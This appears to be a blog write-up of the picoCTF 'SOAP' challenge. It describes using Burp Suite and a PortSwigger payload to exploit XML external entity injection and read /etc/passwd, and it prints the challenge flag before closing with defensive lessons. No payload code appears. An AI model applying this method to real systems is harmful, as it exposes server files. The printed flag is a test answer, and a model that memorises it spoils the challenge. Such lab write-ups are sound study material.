Web
Exploitation
SOAP
Author: Geoffrey
Njogu
Description
The web
project was rushed and no security assessment was done. Can you read the
/etc/passwd file?
Hints:XML
external entity Injection
So after
reading this problem and hint it was very clear that we need to do something
about XXL injection, so I researched about XXE injection and also about XML
files from Chatgpt.
This is the
information provided by Chatgpt.
What is
XXE Injection?
XXE
Injection occurs when an application parses XML input and does not properly
handle XML entities. Attackers can craft malicious XML to exploit this
vulnerability and retrieve sensitive files, execute remote code, or even
conduct denial-of-service (DoS) attacks.
An external
entity allows an XML document to reference external resources like files or
URLs. If not handled securely, these references can be exploited to access
local files or network resources.
Problem
Description
- The application is a web
project, and no security assessments were performed, leaving it vulnerable
to exploitation.
- The challenge is to read the
/etc/passwd file, a common target in CTFs as it contains user
information in Linux systems.
The given hint ("XML External Entity Injection") implies that the application processes XML data insecurely, and we can exploit this to read files.
After this I just checked the website
given by picoctf and read the source code to find if there was any hidden flag
or hints.
Unfortunately
I didn’t found anything.So the next thing I did was I opened the page again see
if the given buttons are working or not because if the buttons are clicked it
could possibly send some information in
the form of XML at the backend.
After
clicking on the first button we can find that some information is been
displayed on the portal.
After clicking on the second button
we can find that some information is displayed on the portal.
Now I
researched about how we can do XXE injection using burp suite and came across a
very good blog by port swigger and then just copied the code from the blog and
then opened the burp suite.
https://portswigger.net/web-security/xxe
I saw a POST
request in the HTTP history and where an XML code was send with some data.
I just the send this request to the
repeater and added my own XML script taken from the blog and sent the request
to the website.
And I found the flag.
picoCTF{XML_3xtern@l_3nt1t1ty_55662c16}
Key Takeaways
This challenge really highlighted several important lessons:
For Developers:
- Never rush security assessments, even for internal projects
- Always validate and sanitize XML input before processing
- Consider disabling external entity processing entirely if it's not needed
- Implement proper input validation at multiple layers
For Security Researchers:
- Understanding the application's functionality is crucial before attempting exploitation
- Tools like Burp Suite are invaluable for analyzing and manipulating web requests
- Reading documentation (like PortSwigger's guides) can provide excellent payload examples
- Sometimes the most straightforward approach works best
Real-World Impact: XXE vulnerabilities aren't just CTF curiosities - they're found in production applications regularly. They can cause sensitive file disclosure, server-side request forgery (SSRF), and even remote code execution in certain situations. Proper XML handling is therefore an important security concern.
The ease with which this exploit was achieved also illustrates why security must never be an afterthought. A minor mistake in XML processing resulted in full file system access, illustrating how a small vulnerability can have major repercussions.
This challenge was an excellent hands-on introduction to XML security concerns and drove home the necessity of rigorous security testing in web application development.
.jpg)
.jpg)
No comments:
Post a Comment